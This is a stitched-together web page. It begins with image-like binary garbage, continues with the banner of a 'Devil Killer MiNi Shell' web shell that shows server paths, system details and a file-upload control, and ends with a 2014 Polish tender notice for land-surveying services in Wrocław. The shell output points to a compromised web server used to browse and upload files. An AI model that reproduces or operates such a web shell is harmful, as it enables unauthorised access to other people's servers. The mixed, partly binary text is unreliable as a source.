JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/64056-N-2014.html

<p class="kh_header"><b>Wrocław: Obsługa geodezyjna Agencji Nieruchomości Rolnych Oddział Terenowy we Wrocławiu</b><br>
<b>Numer ogłoszenia: 64056 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa geodezyjna Agencji Nieruchomości Rolnych Oddział Terenowy we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1Przedmiotem zamówienia jest stała obsługa geodezyjna Agencji Nieruchomości Rolnych Oddział Terenowy we Wrocławiu poprzez świadczenie usług geodezyjnych, w szczególności: wykonywanie podziałów nieruchomości, okazania granic, wznowienia granic, zmiany sposobu użytkowania gruntów, aktualizacji map zasadniczych i operatów ewidencji gruntów, wykonywanie map do celów projektowych oraz aktualizacji map, badanie stanów prawnych nieruchomości. Usługi wykonywane są dla nieruchomości wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na terenie działania Agencji Nieruchomości Rolnych OT we Wrocławiu, województwo dolnośląskie. 
1.2Opis przedmiotu zamówienia według nomenklatury CPV: 71332000-4 Geotechniczne usługi inżynieryjne  
1.3W ramach wykonywania podziałów geodezyjnych wykonawca będzie zobowiązany do wykonania następujących prac:
Podział nieruchomości wykonywany na podstawie ustawy z dnia 21 sierpnia 1997r o gospodarce nieruchomościami (t.j. Dz.U. z 2010r Nr 193 poz. 1287 z poź. zm)
a)podział nieruchomości zgodnie z miejscowym planem zagospodarowania przestrzennego lub decyzją o warunkach zabudowy, decyzją o lokalizacji inwestycji celu publicznego lub przepisów szczególnych w tym zakresie 
1.badanie stanu prawnego nieruchomości, w tym w szczególności zapisów miejscowego planu zagospodarowania przestrzennego gminy
2.sporządzenie wstępnego projektu podziału nieruchomości i przekazanie go Zamawiającemu do akceptacji wraz z mapą ewidencyjną, wypisem z rejestru gruntów oraz odpisem z księgi wieczystej. Po zaakceptowaniu wstępnego projektu podziału Zamawiający wystąpi do wójta, burmistrza lub prezydenta miasta z wnioskiem o podział nieruchomości. 
3.W przypadku negatywnej opinii o zgodności wstępnego projektu z ustaleniami miejscowego planu zagospodarowania przestrzennego gminy ponowne sporządzenie zaakceptowanego  wstępnego projektu podziału w celu uzyskania pozytywnej opinii gminy. 
4.wznowienie punktów granicznych, przyjęcie lub ustalenie granic nieruchomości objętej podziałem 
5.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu, jeśli zachodzi taka konieczność 
6.aktualizacja ewidencji gruntów i budynków oraz mapy zasadniczej w zakresie wymaganym przez rozporządzenie Rady Ministrów w sprawie sposobu i trybu dokonywania podziałów nieruchomości jeśli jest prowadzona dla nieruchomości podlegającej podziałowi
7.sporządzenie protokołu z czynności przejęcia granic
8.wykonanie mapy z projektem podziału nieruchomości 
9.sporządzenie operatu technicznego z podziału (I etap) i złożenie go do kontroli w ośrodku
10.przekazanie do gminy lub miasta projektów podziałów oraz kopii protokołu przyjęcia granic nieruchomości z klauzulą przyjęcia do zasobu lub przekazanie w/w dokumentów Zamawiającemu celem przesłania ich z pismem przewodnim do gminy lub miasta
11.wyznaczenie i trwała stabilizacja na gruncie nowych punktów granicznych oraz sporządzenie protokołu z tych czynności jeśli decyzja zatwierdzająca projekt podziału nieruchomości stanie się ostateczna 
12.przekazanie dokumentów geodezyjnych (II etap) do ośrodka dokumentacji geodezyjnej i kartograficznej
13.zamówienie wyciągów z wykazu zmian danych ewidencyjnych dla zmiany powierzchni działki, rodzaju i powierzchni użytków i podziału nieruchomości. Wyciągi powinny być wydane przez PODGiK oraz zawierać klauzulę mówiącą, że dokument niniejszy jest przeznaczony do dokonywania wpisu w księdze wieczystej lub poświadczonej za zgodność kopi wykazu zmian danych ewidencyjnych w przypadkach, w których zmiany w ewidencji gruntów ujawniane są w księgach wieczystych z urzędu  przez Starostę 
14.przekazanie Zamawiającemu wyciągów z wykazu zmian danych ewidencyjnych lub kopii wykazu zmian danych ewidencyjnych poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego i innych dokumentów wymaganych umową 
b)podział nieruchomości niezależnie od ustaleń miejscowego planu zagospodarowania przestrzennego 
1.badanie stanu prawnego nieruchomości, w tym w szczególności zapisów miejscowego planu zagospodarowania przestrzennego gminy
2.wykonanie projektu podziału nieruchomości i przedstawienie go Zamawiającemu do akceptacji 
3.wznowienie punktów granicznych, przyjęcie lub ustalenie granic nieruchomości objętej podziałem 
4.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu jeśli zachodzi taka konieczność 
5.aktualizacja ewidencji gruntów i budynków oraz mapy zasadniczej w zakresie wymaganym przez rozporządzenie Rady Ministrów w sprawie sposobu i trybu dokonywania podziałów nieruchomości jeśli jest prowadzona dla nieruchomości podlegającej podziałowi. 
6.sporządzenie protokołu z czynności przejęcia granic
7.wykonanie mapy z projektem podziału nieruchomości 
8.sporządzenie operatu technicznego z podziału (I etap) i złożenie go do kontroli w ośrodku
9.przekazanie Zamawiającemu projektów podziałów oraz kopii protokołu przyjęcia granic nieruchomości z klauzulą przyjęcia do zasobu, wraz z mapą ewidencyjną, wypisem z rejestru gruntów oraz odpisem z księgi wieczystej . Zamawiający wystąpi do wójta, burmistrza lub prezydenta miasta z wnioskiem o podział nieruchomości.
10.W przypadku negatywnej decyzji zatwierdzającej projekt podziału nieruchomości, ponowne sporządzenie projektu podziału nieruchomości zaakceptowanego przez Zamawiającego oraz innej dokumentacji niezbędnej do wydania pozytywnej decyzji. 
11.wyznaczenie i trwała stabilizacja na gruncie nowych punktów granicznych oraz sporządzenie protokołu z tych czynności jeśli decyzja zatwierdzająca projekt podziału nieruchomości stanie się ostateczna 
12.przekazanie dokumentów geodezyjnych (II etap) do ośrodka dokumentacji geodezyjnej i kartograficznej
13.zamówienie wyciągów z wykazu zmian danych ewidencyjnych dla zmiany powierzchni działki, rodzaju i powierzchni użytków i podziału nieruchomości. Wyciągi powinny być wydane przez PODGiK oraz zawierać klauzulę mówiącą, że  dokument niniejszy jest przeznaczony  do dokonywania wpisu w księdze wieczystej lub poświadczonej za zgodność kopi wykazu zmian danych ewidencyjnych w przypadkach, w których zmiany w ewidencji gruntów ujawniane są w księgach wieczystych z urzędu  przez Starostę 
14.przekazanie  Zamawiającemu wyciągów z wykazu zmian danych ewidencyjnych lub kopii wykazu zmian danych ewidencyjnych poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego i innych dokumentów wymaganych umową
Podział geodezyjny wykonywany na podstawie ustawy z dnia 18 lipca 2001 prawo wodne (t.j. Dz.U. z 2012 r Nr 0 poz. 145)- ustalenie linii brzegowej  
1.badanie stanu prawnego nieruchomości 
2.wznowienie  punktów granicznych , przyjęcie lub ustalenie  granic nieruchomości objętej podziałem 
3.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu, jeśli zachodzi taka konieczność 
4.aktualizacja ewidencji gruntów i budynków (w tym zmiana sposobu użytkowania na Wp) oraz aktualizacja mapy zasadniczej o niezbędne do podziału elementy zagospodarowania terenu lub w razie potrzeby jej założenie w zakresie nieruchomości podlegającej podziałowi
5.sporządzenie protokołu z czynności przejęcia granic
6.wykonanie projektu rozgraniczenia gruntów pokrytych wodami od gruntów przyległych  zgodnie z art. 15   ustawy prawo wodne 
7.projekt rozgraniczenia gruntów pokrytych wodami od gruntów przyległych należy uzgodnić z DZMiUW we Wrocławiu lub właściwych miejscowo oddziałach DZMiUW 
8.sporządzenie operatu technicznego 
9.przekazanie Zamawiającemu projektu rozgraniczenia gruntów pokrytych wodami od gruntów przyległych do akceptacji. Zamawiający wystąpi do starosty z wnioskiem o ustalenie linii brzegu
10.przekazanie dokumentów geodezyjnych do ośrodka dokumentacji geodezyjnej i kartograficznej (przed  lub po wydaniu decyzji o ustaleniu linii brzegu w zależności od przyjętej procedury przez właściwy organ)
11.zamówienie wyciągów z wykazu zmian danych ewidencyjnych dla zmiany powierzchni działki, rodzaju i powierzchni użytków i podziału nieruchomości. Wyciągi powinny być wydane przez PODGiK oraz zawierać klauzulę mówiącą, że dokument niniejszy jest przeznaczony  do dokonywania wpisu w księdze wieczystej lub poświadczonej za zgodność kopi wykazu zmian danych ewidencyjnych w przypadkach, w których zmiany w ewidencji gruntów ujawniane są w księgach wieczystych z urzędu  przez Starostę 
12.przekazanie Zamawiającemu wyciągów z wykazu zmian danych ewidencyjnych lub kopii wykazu zmian danych ewidencyjnych poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego i innych dokumentów wymaganych umową
Podział geodezyjny nieruchomości rolnych ( w trybie rolnym) 
1.badanie stanu prawnego nieruchomości, w tym badanie zapisów miejscowego planu zagospodarowania przestrzennego, a w przypadku jego braku zapisów studium uwarunkowań i kierunków zagospodarowania przestrzennego lub decyzji o warunkach zabudowy
2.wykonanie projektu podziału nieruchomości i przedstawienie go Zamawiającemu do akceptacji 
3.wznowienie punktów granicznych, ustalenie lub przyjęcie granic nieruchomości objętej podziałem
4.wyznaczenie i trwała stabilizacja na gruncie nowych punktów granicznych
5.sporządzenie protokołu z czynności przejęcia, wznowienia lub ustalenia granic, oraz utrwalenia punktów granicznych 
6.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu
7.aktualizacja ewidencji gruntów i budynków oraz mapy zasadniczej o niezbędne do podziału elementy zagospodarowania terenu w zakresie nieruchomości podlegającej podziałowi jeśli mapa zasadnicza jest prowadzona
8.sporządzenie operatu technicznego z podziału i złożenie go do kontroli w ośrodku dokumentacji geodezyjnej i kartograficznej.
9.zamówienie wyciągów z wykazu zmian danych ewidencyjnych dla zmiany powierzchni działki, rodzaju i powierzchni użytków i podziału nieruchomości. Wyciągi powinny być wydane przez PODGiK oraz zawierać klauzulę mówiącą, że  dokument niniejszy jest przeznaczony  do dokonywania wpisu w księdze wieczystej lub poświadczonej za zgodność kopi wykazu zmian danych ewidencyjnych w przypadkach, w których zmiany w ewidencji gruntów ujawniane są w księgach wieczystych z urzędu  przez Starostę 
10.przekazanie Zamawiającemu wyciągów z wykazu zmian danych ewidencyjnych lub kopii wykazu zmian danych ewidencyjnych poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego i innych dokumentów wymaganych umową
11.przekazanie Zamawiającemu projektu nieruchomości rolnej poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego 
Okazanie granic nieruchomości
1.badanie stanu prawnego nieruchomości 
2.wznowienie punktów granicznych, ustalenie lub przyjęcie granic nieruchomości
3.wyznaczenie i trwała stabilizacja na gruncie nowych punktów granicznych
4.nowy pomiar punktów granicznych 
5.sporządzenie protokołu z czynności okazania granic oraz utrwalenia punktów granicznych 
6.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu, jeśli zachodzi taka konieczność
7.aktualizacja ewidencji gruntów i budynków, jeśli zachodzi taka konieczność 
8.oddanie operatu geodezyjnego do ośrodka dokumentacji geodezyjnej 
9.zamówienie wyciągów z wykazu zmian danych ewidencyjnych dla zmiany powierzchni działki, rodzaju i powierzchni użytków i podziału nieruchomości. Wyciągi powinny być wydane przez PODGiK oraz zawierać klauzulę mówiącą, że dokument niniejszy jest przeznaczony do dokonywania wpisu w księdze wieczystej lub poświadczonej za zgodność kopi wykazu zmian danych ewidencyjnych w przypadkach, w których zmiany w ewidencji gruntów ujawniane są w księgach wieczystych z urzędu  przez Starostę 
10.przekazanie Zamawiającemu wyciągów z wykazu zmian danych ewidencyjnych lub kopii wykazu zmian danych ewidencyjnych poświadczonej za zgodność z dokumentem przyjętym do Państwowego Zasobu Geodezyjnego i Kartograficznego i innych dokumentów wymaganych umową.

Zmiana sposobu użytkowania
1.badanie stanu prawnego nieruchomości 
2.sporządzenie zgłoszenia zmian danych ewidencji gruntów i przedstawienie go Zamawiającemu do podpisu 
3.aktualizacja ewidencji gruntów i budynków 
4.aktualizacja mapy zasadniczej jeśli zachodzi taka konieczność a mapa zasadnicza jest prowadzona 
5.przekazanie operatu geodezyjnego do ośrodka dokumentacji geodezyjnej 

1.4Obowiązujące przepisy prawne i techniczne 
Usługi będące przedmiotem zamówienia należy wykonać według obowiązujących uregulowań prawnych w tym zakresie oraz wytycznych technicznych a w szczególności :
1.Ustawa z dnia 17 maja 1989r Prawo geodezyjne i kartograficzne (T.J. Dz.U. z 2010r Nr 193 poz. 1287 z póź. zm.)
2.Ustawa z dnia 21 sierpnia 1997r o gospodarce nieruchomościami (t.j. Dz.U. z 2010r Nr 120 poz. 651 z poź. zm)
3.Ustawa z dnia 18 lipca 2001 prawo wodne (t.j. Dz.U. z 2012 r Nr 0 poz. 145)
4.Rozporządzenie Rady Ministrów z dnia 07 grudnia 2004r. w sprawie sposobu i trybu dokonywania podziałów nieruchomości (Dz.U. z 2004 Nr 268 poz. 2663)
5.Rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001r w sprawie ewidencji gruntów i budynków (Dz.U. Nr 38 poz. 454)
6.Rozporządzenie Ministra Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki Żywnościowej z dnia 14 kwietnia 1999r. w sprawie rozgraniczenia nieruchomości (Dz.U. z 1999r Nr 45 poz. 453)
7.Rozporządzenie Ministra Rozwoju Regionalnego i Budownictwa z dnia 16 lipca 2001r w sprawie zgłoszenia prac geodezyjnych i kartograficznych, ewidencjonowanie systemów i przechowywania kopii zabezpieczających bazy danych , a także ogólnych warunków umów o udostępnienie tych baz (Dz. U. z 2001r  Nr 78 poz. 837)
8.Rozporządzenie Ministra Infrastruktury z dnia 19 lutego 2004r. w sprawie wysokości opłat za czynności geodezyjne i kartograficzne oraz udzielenie informacji, a także za wykonanie wyrysów i wypisów z operatu ewidencji gruntów (Dz.U. z 2004r Nr 37 poz. 333)
9.Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 09  listopada 2011r. w sprawie standardów technicznych wykonania geodezyjnych pomiarów sytuacyjnych i wysokościowych  oraz opracowania i przekazywania  wyników tych pomiarów  do państwowego zasobu geodezyjnego i kartograficznego (Dz.U. z 2011r  Nr 263 poz. 1572)

1.5Warunki oraz terminy realizacji przedmiotu zamówienia:
1.Wszelkie czynności geodezyjne związane z realizacją zamówienia opisane w punkcie 1.3 Rozdziału I SIWZ, Wykonawca zobowiązany jest każdorazowo zgłaszać i realizować w swoim imieniu 
2.Zamawiający dopuszcza możliwość refundowania należności ponoszonych przez Wykonawcę wynikających z tytułu opłat za czynności geodezyjne i kartograficzne oraz udzielanie informacji, a także za wykonywanie wyrysów i wypisów z operatu ewidencyjnego zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 19 lutego 2004r. (Dz. U. 37 poz.333)
3.Świadczenie usług wykonywanych w ramach niniejszego zamówienia będzie odbywało się: na terenie działania ANR OT we Wrocławiu (woj. dolnośląskie)
4.Wykonawca zobowiązany będzie świadczyć usługi w terenie lub w siedzibie zamawiającego co najmniej w wymiarze 36 godzin w tygodniu w czasie pracy Urzędów tj. od poniedziałku do piątku w godz. 7.30-15.30. 
5.wykonawca zobowiązany będzie do sporządzania sprawozdań z czynności wykonanych w ramach realizacji przedmiotu niniejszej umowy,
6.Wykonawca będzie zobowiązany do obsługi systemów informatycznych ANR w zakresie korzystania i wprowadzania danych związanych z realizacją zamówienia
7.W ramach wykonywanych czynności Wykonawca będzie zobowiązany w imieniu zamawiającego do współpracy z organami administracji publicznej, w zakresie związanym z tematyką geodezyjną w tym  także z klasyfikacją gruntów.	
8.Zamawiający zapewni Wykonawcy nieodpłatną obsługę organizacyjno-techniczną w siedzibie ANR OT we Wrocławiu to jest: 
a)standardowo wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, skanera, plotera, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,
b)samochód służbowy, 
c)odbiornik GPS, tachimetr, ruletkę,
d)wysyłanie i odbiór korespondencji związanej z świadczoną usługą, 
e)kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.

1.6 Pozostałe warunki realizacji przedmiotu zamówienia zostały opisane w istotnych postanowieniach do umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania usług objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty:
2.0Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie Wykonawca zobowiązany jest załączyć do oferty:
2.1Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym. Wykonawca zobowiązany jest załączyć do wniosku:
2.3Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza wniosku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)Na potwierdzenie, ze wykonawca dysponuje osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do wniosku:
2.2Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnień zawodowych określonych w Ustawie 17 maja 1989r. prawo geodezyjne i kartograficzne ( Dz.U. z 2010r Nr 193 poz. 1287 z póź. zm.) w zakresie: 
	- geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjnych i inwestycyjnych
	-rozgraniczanie i podziałów nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych 
2.2.1	Osoba, która będzie realizowała przedmiot umowy, w szczególności będzie pełniła dyżury w siedzibie Zamawiającego zgodnie z ustalonym harmonogramem musi wykazać się przynajmniej 10 - letnim doświadczeniem w administracji publicznej w zakresie podziałów nieruchomości i rozgraniczania nieruchomości oraz geodezyjnych pomiarów sytuacyjno-wysokościowych
2.2.2	Osoba, która będzie realizowała przedmiot umowy, w szczególności będzie pełniła dyżury w siedzibie Zamawiającego musi wykazać się posiadaniem od przynajmniej 10 lat uprawnień zawodowych określonych w Ustawie 17 maja 1989r. prawo geodezyjne i kartograficzne ( Dz.U. z 2010r Nr 193 poz. 1287 z póź. zm.) w zakresie: 
	- geodezyjnych pomiarów sytuacyjno-wysokościowych, realizacyjne i inwestycyjne
	- rozgraniczanie i podziałów nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych
2.2.3	Osoba, która będzie realizowała przedmiot umowy, w szczególności będzie pełniła dyżury w siedzibie Zamawiającego musi wykazać się posiadaniem przynajmniej ukończeniem kursu gleboznawczej klasyfikacji gruntów.
2.3	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza wniosku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.4Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

